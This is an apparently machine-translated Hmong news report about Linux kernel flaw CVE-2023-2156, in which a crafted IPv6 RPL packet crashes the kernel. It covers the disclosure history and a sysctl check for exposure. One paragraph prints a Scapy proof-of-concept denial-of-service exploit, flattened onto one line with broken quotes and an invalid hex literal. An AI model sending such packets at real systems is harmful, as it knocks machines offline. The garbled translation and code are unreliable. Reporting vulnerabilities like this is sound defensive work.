Cov ntaub ntawv tau tshaj tawm txog qhov tsis raug (0-hnub) qhov tsis zoo (CVE-2023-2156) hauv Linux kernel, uas tso cai rau txwv tsis pub lub kaw lus los ntawm kev xa cov ntawv tshwj xeeb tsim IPv6 (pob ntawv-ntawm-tuag). Qhov teeb meem tsuas yog tshwm sim thaum kev txhawb nqa rau RPL (Routing Protocol for Low-Power and Lossy Networks) raws tu qauv tau qhib, uas yog neeg xiam oob khab los ntawm lub neej ntawd hauv kev faib khoom thiab siv feem ntau ntawm cov cuab yeej kos ua haujlwm hauv wireless tes hauj lwm nrog cov pob ntawv poob siab.
Qhov tsis zoo yog tshwm sim los ntawm kev ua tsis raug ntawm cov ntaub ntawv sab nraud hauv RPL raws tu qauv parsing code, uas ua rau muaj kev lees paub tsis ua haujlwm thiab cov ntsiav mus rau hauv lub xeev ntshai. Thaum muab cov ntaub ntawv tau los ntawm kev txheeb xyuas IPv6 RPL pob ntawv header hauv k_buff (Socket Buffer) qauv, yog tias CmprI teb tau teeb tsa rau 15, Segleft teb rau 1, thiab CmprE rau 0, 48-byte vector nrog chaw nyob yog decompressed rau 528 bytes thiab tshwm sim qhov teeb meem uas lub cim xeeb faib rau qhov tsis txaus. Hauv qhov no, skb_push muaj nuj nqi, siv los thawb cov ntaub ntawv mus rau hauv cov qauv, kuaj xyuas qhov tsis sib xws ntawm qhov loj ntawm cov ntaub ntawv thiab qhov tsis muaj, ua rau muaj kev ntxhov siab los tiv thaiv kev sau ntawv dhau ntawm qhov tsis muaj ciam teb.
Piv txwv exploit: # Peb yuav siv Scapy los tsim cov pob ntawv los ntawm scapy.all import * import socket # Siv IPv6 los ntawm koj lub LAN interface DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Peb siv cov sockets xa cov pob ntawv sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft lub pob ntawv # Hom = 3 ua qhov no RPL pob ntawv # Chaw nyob muaj 3 qhov chaw nyob, tab sis vim CmprI yog 15, # txhua octet ntawm thawj ob qhov chaw nyob yog kho raws li qhov chaw nyob compressed # Segleft = 1 txhawm rau ua kom lub suab nrov # lastentry = 0xf0 teeb CmprI rau 15 thiab CmprE rau 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, addresses=[”] :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Xa cov pob ntawv phem no sockfd.sendto(bytes(p), (DST_ADDR, 0))
Nws yog ib qho tseem ceeb uas cov neeg tsim tawm kernel tau ceeb toom txog qhov tsis zoo rov qab rau lub Ib Hlis 2022 thiab dhau 15 lub hlis dhau los lawv tau sim kho qhov teeb meem peb zaug, tso tawm thaj ua rau lub Cuaj Hlis 2022, Lub Kaum Hli 2022 thiab Lub Plaub Hlis 2023, tab sis txhua zaus kho tau. tsis txaus thiab qhov tsis zoo yuav tsis raug tsim tawm. Thaum kawg, ZDI project, uas tau koom tes ua haujlwm los kho qhov tsis zoo, tau txiav txim siab tso tawm cov ncauj lus kom ntxaws txog qhov tsis zoo yam tsis tau tos txog kev txhim kho ua haujlwm kom muaj nyob rau hauv cov ntsiav.
Yog li ntawd, qhov yooj yim tseem tseem unfixed. Tshwj xeeb, thaj ua rau muaj nyob rau hauv 6.4-rc2 kernel tsis zoo. Cov neeg siv tau qhia kom xyuas tias RPL raws tu qauv tsis siv ntawm lawv lub tshuab, uas tuaj yeem ua tiav siv cov lus txib sysctl -a | grep -i rpl_seg_enabled
Tau qhov twg los: opennet.ru